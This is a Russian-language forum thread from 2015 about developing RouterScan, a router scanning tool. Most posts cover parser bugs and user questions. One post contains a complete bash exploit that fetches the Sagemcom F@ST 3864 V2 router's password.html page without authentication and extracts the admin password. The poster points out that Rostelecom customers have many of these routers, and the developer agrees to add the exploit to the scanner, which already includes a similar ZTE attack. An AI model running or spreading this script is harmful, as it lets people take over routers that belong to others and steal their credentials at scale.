 |
|
16.08.2015, 20:48
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от Felis-Sapiens
По поводу MikroTik'ов уже когда-то писал на сайте RouterScan'а; хорошо бы доделать, а то 6-ую версию неправильно парсит: https://yadi.sk/i/UGSyALw6iTrLK
Вот, на всякий случай, несколько примеров:
v6.22 http://[email protected]/
v6.27 http://[email protected]/
v5.24 http://[email protected]/
Последний отпарсился корректно, когда я зашёл и вышел при помощи браузера. Кстати, если я не обознался, именно вы помогли мне тогда написать парсер для Mikrotik.
|
|
|
16.08.2015, 21:51
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме:
109967
Репутация:
171
|
|
Сообщение от binarymaster
Последний отпарсился корректно, когда я зашёл и вышел при помощи браузера. Кстати, если я не обознался, именно вы помогли мне тогда написать парсер для Mikrotik.
Все правильно - последний ip это MikroTik с ОС v5.24, они парсились нормально. Я его привел, чтобы можно было проверить, что ничего не сломалось. Структура данных изменилась с версии 6.8 или 6.9.
И да, вы не обознались
|
|
|
|
17.08.2015, 00:42
|
|
Участник форума
Регистрация: 29.01.2012
Сообщений: 143
Провел на форуме:
32056
Репутация:
6
|
|
Что нового в программе? Что добавлено?
|
|
|
|
17.08.2015, 18:45
|
|
New Member
Регистрация: 06.08.2015
Сообщений: 15
Провел на форуме:
4866
Репутация:
0
|
|
Что то не пойму что на 25 порте?  |
|
|
|
17.08.2015, 21:03
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от hunt.lsk
Что нового в программе? Что добавлено?
Как релиз будет, всё напишу.
Сообщение от pte273
Что то не пойму что на 25 порте?
25/tcp - SMTP, почтовые серверы. Их нет особого смысла сканировать, у них свой протокол отличный от HTTP.
Лично у меня на этих адресах нет подобного эффекта, порты закрыты. Скорее всего так работает ваш антивирус, брандмауэр или что-то ещё.
|
|
|
|
17.08.2015, 21:32
|
|
New Member
Регистрация: 06.08.2015
Сообщений: 15
Провел на форуме:
4866
Репутация:
0
|
|
Сообщение от binarymaster
Как релиз будет, всё напишу.
25/tcp - SMTP, почтовые серверы. Их нет особого смысла сканировать, у них свой протокол отличный от HTTP.
Лично у меня на этих адресах нет подобного эффекта, порты закрыты. Скорее всего так работает ваш антивирус, брандмауэр или что-то ещё.
Точно антивирус шалит
|
|
|
|
18.08.2015, 10:46
|
|
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
Провел на форуме:
884729
Репутация:
373
|
|
Новый сплойт по получению паролей с вэбиморды роутера Sagemcom 3864 V2 (таких много есть у Ростелекома)
Код:
#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################
# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
echo "Usage : $0 IP_ADDRESS"
exit 1
fi
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"
Может возможно его запилить в RouterScan. |
|
|
|
18.08.2015, 13:15
|
|
Member
Регистрация: 20.07.2015
Сообщений: 32
Провел на форуме:
7851
Репутация:
0
|
|
А можно в Router Scan сделать ручное(пользовательское) редактирование столбцов(поменять столбцы местами(IP, MAC и т.п.)).
|
|
|
|
18.08.2015, 13:28
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от user100
Новый сплойт по получению паролей с вэбиморды роутера Sagemcom 3864 V2 (таких много есть у Ростелекома)
Может возможно его запилить в RouterScan.
Да, вполне можно. Очень похожая уязвимость есть в ZTE ZXDSL 831AII/CII и она уже реализована.
|
|
|
|
18.08.2015, 13:57
|
|
New Member
Регистрация: 13.10.2012
Сообщений: 14
Провел на форуме:
2627
Репутация:
0
|
|
У меня в локалке часто встречается GoAhead-Webs (Web management System)
Перехожу по айпи, открывается страничка с приглашением ввода логина пароля и лейбл QTECH
Никто не знает что это такое?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
